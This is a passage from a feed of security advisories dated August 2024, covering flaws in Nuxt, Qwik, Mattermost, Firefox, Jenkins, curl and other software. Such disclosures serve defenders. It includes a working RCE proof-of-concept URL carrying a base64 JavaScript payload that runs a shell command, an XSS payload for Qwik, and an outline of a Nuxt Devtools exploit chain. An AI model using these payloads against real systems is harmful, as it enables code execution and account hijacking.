URL:```http://localhost:3000/__nuxt_component_test__/?path=data%3Atext%2Fjavascript%3Bbase64%2CKGF3YWl0IGltcG9ydCgnZnMnKSkud3JpdGVGaWxlU3luYygnL3RtcC90ZXN0JywgKGF3YWl0IGltcG9ydCgnY2hpbGRfcHJvY2VzcycpKS5zcGF3blN5bmMoIndob2FtaSIpLnN0ZG91dCwgJ3V0Zi04Jyk```3. Confirm that the output of `whoami` is written to `/tmp/test`Demonstration video: https://www.youtube.com/watch?v=FI6mN8WbcE4### ImpactUsers who open a malicious web page in the browser while running the test locally are affected by this vulnerability, which results in the remote code execution from the malicious web page.Since web pages can send requests to arbitrary addresses, a malicious web page can repeatedly try to exploit this vulnerability, which then triggers the exploit when the test server starts.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-V784-FJJH-F8R4
05.08.2024 22:49:23	npm	[NPM:GHSA-VF6R-87Q4-2VJF] nuxt vulnerable to Cross-site Scripting in navigateTo if used after SSR (moderate)	### SummaryThe `navigateTo` function attempts to blockthe `javascript:` protocol, but does not correctly use API's provided by `unjs/ufo`. This library also contains parsing discrepancies.### DetailsThe function first tests to see if the specified [URL has a protocol](https://github.com/nuxt/nuxt/blob/fa9d43753d25fc2e8c3107f194b2bab6d4ebcb9a/packages/nuxt/src/app/composables/router.ts#L142). This uses the [unjs/ufo](https://github.com/unjs/ufo) package for URL parsing. This function works effectively, and returns true for a `javascript:` protocol.After this, the URL is parsed using the [`parseURL`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/parse.ts#L47) function. This function will refuse to parse poorly formatted URLs. Parsing `javascript:alert(1)` returns null/"" for all values. Next, the protocol of the URL is then checked using the [`isScriptProtocol`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/utils.ts#L74) function. This function simply checks the input against a list of protocols, and does not perform any parsing. The combination of refusing to parse poorly formatted URLs, and not performing additional parsing means that script checks fail as no protocol can be found. Even if a protocol was identified, whitespace is not stripped in the `parseURL` implementation, bypassing the `isScriptProtocol` checks. Certain special protocols are identified at the top of [`parseURL`](https://github.com/unjs/ufo/blob/e970686b2acae972136f478732450f6a2f1ab5e5/src/parse.ts#L49). Inserting a newline or tab into this sequence will block the special protocol check, and bypass the latter checks. ### PoCPOC - https://stackblitz.com/edit/nuxt-xss-navigateto?file=app.vueAttempt payload X, then attempt payload Y.### ImpactXSS, access to cookies, make requests on user's behalf. ### RecommendationsAs always with these bugs, the `URL` constructor provided by the browser is always the safest method of parsing a URL. Given the cross-platform requirements of nuxt/ufo a more appropriate solution is to make parsing consistent between functions, and to adapt parsing to be more consistent with the [WHATWG URL specification](https://url.spec.whatwg.org/).### NoteI've reported this vulnerability here as it is unclear if this is a bug in ufo or a misuse of the ufo library.This ONLY has impact after SSR has occured, the `javascript:` protocol within a location header does not trigger XSS.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VF6R-87Q4-2VJF
05.08.2024 22:48:58	npm	[NPM:GHSA-RCVG-RGF7-PPPV] Nuxt Devtools has a Path Traversal: '../filedir' (high)	### SummaryNuxt Devtools is missing authentication on the `getTextAssetContent` RPC function which is vulnerable to path traversal. Combined with a lack of Origin checks on the WebSocket handler, an attacker is able to interact with a locally running devtools instance and exfiltrate data abusing this vulnerability. In certain configurations an attacker could leak the devtools authentication token and then abuse other RPC functions to achieve RCE. ### DetailsThe `getTextAssetContent` function does not check for path traversals [(source)](https://github.com/nuxt/devtools/blob/c4f2b68281203fc3f61ffc97d9c6623fbfde46bb/packages/devtools/src/server-rpc/assets.ts#L88C48-L88C48), this could allow an attacker to read arbitrary files over the RPC WebSocket. The WebSocket server does not check the origin of the request [(source)](https://github.com/nuxt/devtools/blob/c4f2b68281203fc3f61ffc97d9c6623fbfde46bb/packages/devtools/src/server-rpc/index.ts#L109) leading to [CSWSH](https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking). This may be intentional to allow certain configurations to work correctly.Nuxt Devtools authentication tokens are placed within the home directory of the current user [(source)](https://github.com/nuxt/devtools/blob/c4f2b68281203fc3f61ffc97d9c6623fbfde46bb/packages/devtools/src/dev-auth.ts#L14).In the scenario that: + The user has a Nuxt3 Project running + Devtools is enabled and running + The project is placed within the users home directory. + The user visits a malicious webpage + User has authenticated with devtools at least onceThe malicious webpage can connect to the Devtools WebSocket, perform a directory traversal brute force to find the authentication token, then use the authenticated [`writeStaticAssets` function](https://github.com/nuxt/devtools/blob/c4f2b68281203fc3f61ffc97d9c6623fbfde46bb/packages/devtools/src/server-rpc/assets.ts#L96C11-L96C28) to create a new Component, Nitro Handler or `app.vue` file which will run automatically as the file is changed.### PoCPOC will exploit the Devtools server on localhost:3000 (you may need to manually restart the server as the restart hook does not always work).POC: https://devtools-exploit.pages.dev1. Create a new project with nuxt.new.2. Place the project inside your home directory.3. Run `pnpm run dev`.4. Open the POC page.The POC will:+ Identify devtools version.+ Leak your devtools token.+ Create a new server handler with an insecure eval.### Impact+ All new Nuxt projects by default (devtools is enabled) are vulnerable to arbitrary file read.+ Certain Nuxt configurations are vulnerable to Remote Code Execution	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RCVG-RGF7-PPPV
05.08.2024 14:21:44	ubuntu	[USN-6944-1] curl vulnerability	curl could be made to crash or expose information if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6944-1
05.08.2024 18:14:22	npm	[NPM:GHSA-FFXG-5F8M-H72J] Rocket.Chat Server-Side Request Forgery (SSRF) vulnerability (high)	A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FFXG-5F8M-H72J
05.08.2024 03:00:00	cisa	[CISA-2024:0805] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0805
05.08.2024 03:00:00	debian	[DSA-5736-1] openjdk-11 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5736-1
05.08.2024 03:00:00	debian	[DSA-5737-1] libreoffice (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5737-1
05.08.2024 16:51:27	npm	[NPM:GHSA-49Q7-C7J4-3P7M] Elliptic allows BER-encoded signatures (low)	In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-49Q7-C7J4-3P7M
05.08.2024 16:51:06	npm	[NPM:GHSA-977X-G7H5-7QGW] Elliptic's ECDSA missing check for whether leading bit of r and s is zero (low)	In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because there is a missing check for whether the leading bit of r and s is zero.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-977X-G7H5-7QGW
05.08.2024 16:21:12	npm	[NPM:GHSA-F7Q4-PWC6-W24P] Elliptic's EDDSA missing signature length check (low)	In the Elliptic package 6.5.6 for Node.js, EDDSA signature malleability occurs because there is a missing signature length check, and thus zero-valued bytes can be removed or appended.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F7Q4-PWC6-W24P
07.08.2024 07:09:07	slackware	[SSA:2024-219-01] mozilla-firefox (critical)	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.14.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.14.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-34/ https://www.cve.org/CVERecord?id=CVE-2024-7519 https://www.cve.org/CVERecord?id=CVE-2024-7521 https://www.cve.org/CVERecord?id=CVE-2024-7522 https://www.cve.org/CVERecord?id=CVE-2024-7524 https://www.cve.org/CVERecord?id=CVE-2024-7525 https://www.cve.org/CVERecord?id=CVE-2024-7526 https://www.cve.org/CVERecord?id=CVE-2024-7527 https://www.cve.org/CVERecord?id=CVE-2024-7529 https://www.cve.org/CVERecord?id=CVE-2024-7531 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.14.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.14.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.1.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.1.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:a4b5568475ce482f390e8121e344f35a mozilla-firefox-115.14.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:9dc49ea62b99c69ec8018470cae37d5f mozilla-firefox-115.14.0esr-x86_64-1_slack15.0.txzSlackware -current package:46c301b42b9fa39d50a1262b4d64f2fd xap/mozilla-firefox-128.1.0esr-i686-1.txzSlackware x86_64 -current package:700d18fecff8418b343158b30716cc21 xap/mozilla-firefox-128.1.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.14.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-219-01
07.08.2024 01:30:29	go	[GO-2024-3020] Mattermost allows a remote actor to permanently delete local data by abusingdangerous error handling in github.com/mattermost/mattermost-server (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3020
07.08.2024 01:30:29	go	[GO-2024-3022] Mattermost allows remote actor to set arbitrary RemoteId values for syncedusers in github.com/mattermost/mattermost-server (low)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3022
07.08.2024 01:30:29	go	[GO-2024-3024] Mattermost allows a user on a remote to set their remote username prop to anarbitrary string in github.com/mattermost/mattermost-server (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3024
07.08.2024 01:30:29	go	[GO-2024-3025] Mattermost failed to disallow the modification of local users when syncing usersin shared channels in github.com/mattermost/mattermost-server (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3025
07.08.2024 01:30:29	go	[GO-2024-3030] Mattermost failed to properly validate synced reactions in github.com/mattermost/mattermost-server (low)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3030
07.08.2024 01:30:29	go	[GO-2024-3031] Mattermost allows a remote actor to make an arbitrary local channel read-only in github.com/mattermost/mattermost-server (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3031
07.08.2024 01:30:29	go	[GO-2024-3044] lorawan-stack Open Redirect vulnerability in go.thethings.network/lorawan-stack (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3044
07.08.2024 01:30:29	go	[GO-2024-3045] Meshery SQL Injection vulnerability in github.com/layer5io/meshery (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3045
07.08.2024 01:30:29	go	[GO-2024-3046] memos vulnerable to Server-Side Request Forgery in /api/resource in github.com/usememos/memos (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3046
07.08.2024 01:30:29	go	[GO-2024-3047] memos vulnerable to Server-Side Request Forgery in /o/get/httpmeta in github.com/usememos/memos (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3047
07.08.2024 01:30:29	go	[GO-2024-3048] RobotsAndPencils go-saml authentication bypass vulnerability in github.com/RobotsAndPencils/go-saml (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3048
07.08.2024 01:30:29	go	[GO-2024-3049] memos vulnerable to Server-Side Request Forgery and Cross-site Scripting in github.com/usememos/memos (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3049
07.08.2024 01:30:29	go	[GO-2024-3050] Meshery SQL Injection vulnerability in github.com/layer5io/meshery (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3050
07.08.2024 01:30:29	go	[GO-2024-3051] Meshery SQL Injection vulnerability in github.com/layer5io/meshery (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3051
07.08.2024 01:30:29	go	[GO-2024-3052] gotortc vulnerable to Cross-Site Request Forgery in github.com/AlexxIT/go2rtc (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3052
07.08.2024 01:30:29	go	[GO-2024-3053] gotortc Cross-site Scripting vulnerability in github.com/AlexxIT/go2rtc (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3053
07.08.2024 01:30:29	go	[GO-2024-3054] Owncast Cross-Site Request Forgery vulnerability in github.com/owncast/owncast (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3054
07.08.2024 01:30:29	go	[GO-2024-3055] gotortc Cross-site Scripting vulnerability in github.com/AlexxIT/go2rtc (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3055
07.08.2024 01:30:29	go	[GO-2024-3056] Gitea Cross-site Scripting Vulnerability in code.gitea.io/gitea		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3056
06.08.2024 21:55:34	npm	[NPM:GHSA-2RWJ-7XQ8-4GX4] Qwik has a potential mXSS vulnerability due to improper HTML escaping (moderate)	### SummaryA potential mXSS vulnerability exists in Qwik for versions up to 1.6.0.### DetailsQwik improperly escapes HTML on server-side rendering. It converts strings according to the following rules:https://github.com/QwikDev/qwik/blob/v1.5.5/packages/qwik/src/core/render/ssr/render-ssr.ts#L1182-L1208- If the string is an attribute value: - `"` -> `"` - `&` -> `&` - Other characters -> No conversion- Otherwise: - `<` -> `<` - `>` -> `>` - `&` -> `&` - Other characters -> No conversionIt sometimes causes the situation that the final DOM tree rendered on browsers is different from what Qwik expects on server-side rendering. This may be leveraged to perform XSS attacks, and a type of the XSS is known as mXSS (mutation XSS).## PoCA vulnerable component:```javascriptimport { component$ } from "@builder.io/qwik";import { useLocation } from "@builder.io/qwik-city";export default component$(() => { // user input const { url } = useLocation(); const href = url.searchParams.get("href") ?? "https://example.com"; return ( <div> <noscript> <a href={href}>test</a> </noscript> </div> );});```If a user accesses the following URL,```http://localhost:4173/?href=</noscript><script>alert(123)</script>```then, `alert(123)` will be executed.### ImpactXSS	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2RWJ-7XQ8-4GX4
06.08.2024 21:55:45	npm	[NPM:GHSA-F83W-WQHC-CFP4] Matrix SDK for React's URL preview setting for a room is controllable by the HS (moderate)	### ImpactA malicious homeserver could manipulate a user's account data to cause the client to enable URL previews in end-to-end encrypted rooms, in which case any URLs in encrypted messages would be sent to the server.Even if the CVSS score would be 4.1 ([AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N&version=3.1)) the maintainer classifies this as High severity issue.### PatchesThis was patched in matrix-react-sdk 3.105.0.### WorkaroundsDeployments that trust their homeservers, as well as closed federations of trusted servers, are not affected.### ReferencesN/A.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F83W-WQHC-CFP4
06.08.2024 03:00:00	debian	[DSA-5738-1] openjdk-17 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5738-1
06.08.2024 03:00:00	debian	[DSA-5739-1] wpa	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5739-1
06.08.2024 03:00:00	gentoo	[GLSA-202408-01] containerd: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in containerd, the worst of which could lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-01
06.08.2024 03:00:00	gentoo	[GLSA-202408-02] Mozilla Firefox: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-02
06.08.2024 03:00:00	mozilla	[MFSA-2024-33] Security Vulnerabilities fixed in Firefox 129 (high)	- CVE-2024-7518: Fullscreen notification dialog can be obscured by document content (high)Select options could obscure the fullscreen notification dialog. This could be used by a malicious site to perform a spoofing attack.- CVE-2024-7519: Out of bounds memory access in graphics shared memory handling (high)Insufficient checks when processing graphics shared memory could have led to memory corruption. This could be leveraged by an attacker to perform a sandbox escape.- CVE-2024-7520: Type confusion in WebAssembly (high)A type confusion bug in WebAssembly could be leveraged by an attacker to potentially achieve code execution.- CVE-2024-7521: Incomplete WebAssembly exception handing (high)Incomplete WebAssembly exception handing could have led to a use-after-free.- CVE-2024-7522: Out of bounds read in editor component (high)Editor code failed to check an attribute value. This could have led to an out-of-bounds read.- CVE-2024-7523: Document content could partially obscure security prompts (high)A select option could partially obscure security prompts. This could be used by a malicious site to trick a user into granting permissions. This issue only affects Android versions of Firefox.- CVE-2024-7524: CSP strict-dynamic bypass using web-compatibility shims (high)Firefox adds web-compatibility shims in place of some tracking scripts blocked by Enhanced Tracking Protection. On a site protected by Content Security Policy in "strict-dynamic" mode, an attacker able to inject an HTML element could have used a DOM Clobbering attack on some of the shims and achieved XSS, bypassing the CSP strict-dynamic protection.- CVE-2024-7525: Missing permission check when creating a StreamFilter (high)It was possible for a web extension with minimal permissions to create a <code>StreamFilter</code> which could be used to read and modify the response body of requests on any site.- CVE-2024-7526: Uninitialized memory used by WebGL (high)ANGLE failed to initialize parameters which lead to reading from uninitialized memory. This could be leveraged to leak sensitive data from memory.- CVE-2024-7527: Use-after-free in JavaScript garbage collection (high)Unexpected marking work at the start of sweeping could have led to a use-after-free.- CVE-2024-7528: Use-after-free in IndexedDB (high)Incorrect garbage collection interaction in IndexedDB could have led to a use-after-free.- CVE-2024-7529: Document content could partially obscure security prompts (moderate)The date picker could partially obscure security prompts. This could be used by a malicious site to trick a user into granting permissions.- CVE-2024-7530: Use-after-free in JavaScript code coverage collection (moderate)Incorrect garbage collection interaction could have led to a use-after-free.- CVE-2024-7531: PK11_Encrypt using CKM_CHACHA20 can reveal plaintext on Intel Sandy Bridge machines (low)Calling <code>PK11_Encrypt()</code> in NSS using CKM_CHACHA20 and the same buffer for input and output can result in plaintext on an Intel Sandy Bridge processor. In Firefox this only affects the QUIC header protection feature when the connection is using the ChaCha20-Poly1305 cipher suite. The most likely outcome is connection failure, but if the connection persists despite the high packet loss it could be possible for a network observer to identify packets as coming from the same source despite a network path change.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-33
06.08.2024 03:00:00	mozilla	[MFSA-2024-34] Security Vulnerabilities fixed in Firefox ESR 115.14 (high)	- CVE-2024-7519: Out of bounds memory access in graphics shared memory handling (high)Insufficient checks when processing graphics shared memory could have led to memory corruption. This could be leveraged by an attacker to perform a sandbox escape.- CVE-2024-7521: Incomplete WebAssembly exception handing (high)Incomplete WebAssembly exception handing could have led to a use-after-free.- CVE-2024-7522: Out of bounds read in editor component (high)Editor code failed to check an attribute value. This could have led to an out-of-bounds read.- CVE-2024-7524: CSP strict-dynamic bypass using web-compatibility shims (high)Firefox adds web-compatibility shims in place of some tracking scripts blocked by Enhanced Tracking Protection. On a site protected by Content Security Policy in "strict-dynamic" mode, an attacker able to inject an HTML element could have used a DOM Clobbering attack on some of the shims and achieved XSS, bypassing the CSP strict-dynamic protection.- CVE-2024-7525: Missing permission check when creating a StreamFilter (high)It was possible for a web extension with minimal permissions to create a <code>StreamFilter</code> which could be used to read and modify the response body of requests on any site.- CVE-2024-7526: Uninitialized memory used by WebGL (high)ANGLE failed to initialize parameters which led to reading from uninitialized memory. This could be leveraged to leak sensitive data from memory.- CVE-2024-7527: Use-after-free in JavaScript garbage collection (high)Unexpected marking work at the start of sweeping could have led to a use-after-free.- CVE-2024-7529: Document content could partially obscure security prompts (moderate)The date picker could partially obscure security prompts. This could be used by a malicious site to trick a user into granting permissions.- CVE-2024-7531: PK11_Encrypt using CKM_CHACHA20 can reveal plaintext on Intel Sandy Bridge machines (low)Calling PK11_Encrypt() in NSS using CKM_CHACHA20 and the same buffer for input and output can result in plaintext on an Intel Sandy Bridge processor. In Firefox this only affects the QUIC header protection feature when the connection is using the ChaCha20-Poly1305 cipher suite. The most likely outcome is connection failure, but if the connection persists despite the high packet loss it could be possible for a network observer to identify packets as coming from the same source despite a network path change.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-34
06.08.2024 03:00:00	mozilla	[MFSA-2024-35] Security Vulnerabilities fixed in Firefox ESR 128.1 (high)	- CVE-2024-7518: Fullscreen notification dialog can be obscured by document content (high)Select options could obscure the fullscreen notification dialog. This could be used by a malicious site to perform a spoofing attack.- CVE-2024-7519: Out of bounds memory access in graphics shared memory handling (high)Insufficient checks when processing graphics shared memory could have led to memory corruption. This could be leveraged by an attacker to perform a sandbox escape.- CVE-2024-7520: Type confusion in WebAssembly (high)A type confusion bug in WebAssembly could be leveraged by an attacker to potentially achieve code execution.- CVE-2024-7521: Incomplete WebAssembly exception handing (high)Incomplete WebAssembly exception handing could have led to a use-after-free.- CVE-2024-7522: Out of bounds read in editor component (high)Editor code failed to check an attribute value. This could have led to an out-of-bounds read.- CVE-2024-7524: CSP strict-dynamic bypass using web-compatibility shims (high)Firefox adds web-compatibility shims in place of some tracking scripts blocked by Enhanced Tracking Protection. On a site protected by Content Security Policy in "strict-dynamic" mode, an attacker able to inject an HTML element could have used a DOM Clobbering attack on some of the shims and achieved XSS, bypassing the CSP strict-dynamic protection.- CVE-2024-7525: Missing permission check when creating a StreamFilter (high)It was possible for a web extension with minimal permissions to create a <code>StreamFilter</code> which could be used to read and modify the response body of requests on any site.- CVE-2024-7526: Uninitialized memory used by WebGL (high)ANGLE failed to initialize parameters which led to reading from uninitialized memory. This could be leveraged to leak sensitive data from memory.- CVE-2024-7527: Use-after-free in JavaScript garbage collection (high)Unexpected marking work at the start of sweeping could have led to a use-after-free.- CVE-2024-7528: Use-after-free in IndexedDB (high)Incorrect garbage collection interaction in IndexedDB could have led to a use-after-free.- CVE-2024-7529: Document content could partially obscure security prompts (moderate)The date picker could partially obscure security prompts. This could be used by a malicious site to trick a user into granting permissions.- CVE-2024-7531: PK11_Encrypt using CKM_CHACHA20 can reveal plaintext on Intel Sandy Bridge machines (low)Calling PK11_Encrypt() in NSS using CKM_CHACHA20 and the same buffer for input and output can result in plaintext on an Intel Sandy Bridge processor. In Firefox this only affects the QUIC header protection feature when the connection is using the ChaCha20-Poly1305 cipher suite. The most likely outcome is connection failure, but if the connection persists despite the high packet loss it could be possible for a network observer to identify packets as coming from the same source despite a network path change.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-35
06.08.2024 03:00:00	mozilla	[MFSA-2024-37] Security Vulnerabilities fixed in Thunderbird 128.1 (high)	In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potential risks in browser or browser-like contexts.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-37
06.08.2024 03:00:00	mozilla	[MFSA-2024-38] Security Vulnerabilities fixed in Thunderbird 115.14 (high)	In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potential risks in browser or browser-like contexts.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-38
07.08.2024 19:00:00	cisco	[CISCO-SA-ISE-XSS-V2BM9JCY] Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerabilities (medium)	Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-XSS-V2BM9JCY
07.08.2024 19:00:00	cisco	[CISCO-SA-SPA-HTTP-VULNS-RJZMX2XZ] Cisco Small Business SPA300 Series and SPA500 Series IP Phones Web UI Vulnerabilities (critical)	Multiple vulnerabilities in the web-based management interface of Cisco Small Business SPA300 Series IP Phones and Cisco Small Business SPA500 Series IP Phones could allow an attacker to execute arbitrary commands on the underlying operating system or cause a denial of service (DoS) condition.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has not released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SPA-HTTP-VULNS-RJZMX2XZ
07.08.2024 21:26:59	maven	[MAVEN:GHSA-8PV9-QH96-9HC6] Jenkins does not perform a permission check in an HTTP endpoint (moderate)	Jenkins 2.470 and earlier, LTS 2.452.3 and earlier does not perform a permission check in an HTTP endpoint.This allows attackers with Overall/Read permission to access other users' "My Views". Attackers with global View/Configure and View/Delete permissions are also able to change other users' "My Views".Jenkins 2.471, LTS 2.452.4, LTS 2.462.1 restricts access to a user’s "My Views" to the owning user and administrators.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8PV9-QH96-9HC6
07.08.2024 21:16:38	maven	[MAVEN:GHSA-H856-FFVV-XVR4] Jenkins Remoting library arbitrary file read vulnerability (critical)	Jenkins uses the Remoting library (typically `agent.jar` or `remoting.jar`) for the communication between controller and agents. This library allows agents to load classes and classloader resources from the controller, so that Java objects sent from the controller (build steps, etc.) can be executed on agents.In addition to individual class and resource files, Remoting also allows Jenkins plugins to transmit entire jar files to agents using the `Channel#preloadJar` API. As of publication of this advisory, this feature is used by the following plugins distributed by the Jenkins project: bouncycastle API, Groovy, Ivy, TeamConcertIn Remoting 3256.v88a_f6e922152 and earlier, except 3206.3208.v409508a_675ff and 3248.3250.v3277a_8e88c9b_, included in Jenkins 2.470 and earlier, LTS 2.452.3 and earlier, calls to `Channel#preloadJar` result in the retrieval of files from the controller by the agent using `ClassLoaderProxy#fetchJar`. Additionally, the implementation of `ClassLoaderProxy#fetchJar` invoked on the controller does not restrict paths that agents could request to read from the controller file system.This allows agent processes, code running on agents, and attackers with Agent/Connect permission to read arbitrary files from the Jenkins controller file system.The Remoting library in Jenkins 2.471, LTS 2.452.4, LTS 2.462.1 now sends jar file contents with `Channel#preloadJar` requests, the only use case of `ClassLoaderProxy#fetchJar` in agents, so that agents do not need to request jar file contents from controllers anymore.To retain compatibility with older versions of Remoting in combination with the plugins listed above, `ClassLoaderProxy#fetchJar` is retained and otherwise unused, just deprecated. Its implementation in Jenkins 2.471, LTS 2.452.4, LTS 2.462.1 was changed so that it is now limited to retrieving jar files referenced in the core classloader or any plugin classloader.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H856-FFVV-XVR4
07.08.2024 17:48:26	curl	[CURL-CVE-2024-6874] macidn punycode buffer overread (low)	libcurl's URL API function[curl_url_get()](https://curl.se/libcurl/c/curl_url_get.html) offers punycodeconversions, to and from IDN. Asking to convert a name that is exactly 256bytes, libcurl ends up reading outside of a stack based buffer when built touse the macidn IDN backend. The conversion function then fills up theprovided buffer exactly - but does not null terminate the string.This flaw can lead to stack contents accidentally getting returned as part ofthe converted string.	https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6874
08.08.2024 02:17:54	curl	[CURL-CVE-2024-6197] freeing stack buffer in utf8asn1str (medium)	libcurl's ASN1 parser has this `utf8asn1str()` function used for parsing anASN.1 UTF-8 string. It can detect an invalid field and return error.Unfortunately, when doing so it also invokes `free()` on a 4 byte local stackbuffer.Most modern malloc implementations detect this error and immediately abort.Some however accept the input pointer and add that memory to its list ofavailable chunks. This leads to the overwriting of nearby stack memory. Thecontent of the overwrite is decided by the `free()` implementation; likely tobe memory pointers and a set of flags.The most likely outcome of exploiting this flaw is a crash, although it cannotbe ruled out that more serious results can be had in special circumstances.	https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6197
09.08.2024 03:08:54	ubuntu	[USN-6953-1] Linux kernel (Oracle) vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6953-1
09.08.2024 03:06:04	ubuntu	[USN-6952-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6952-1
09.08.2024 01:45:31	ubuntu	[USN-6951-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6951-1
09.08.2024 01:09:14	ubuntu	[USN-6950-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6950-1
09.08.2024 00:48:24	ubuntu	[USN-6949-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6949-1
08.08.2024 22:21:44	ubuntu	[USN-6948-1] Salt vulnerabilities (critical)	Several security issues were fixed in Salt.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6948-1
08.08.2024 05:20:23	ubuntu	[USN-6947-1] Kerberos vulnerabilities	Kerberos could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6947-1
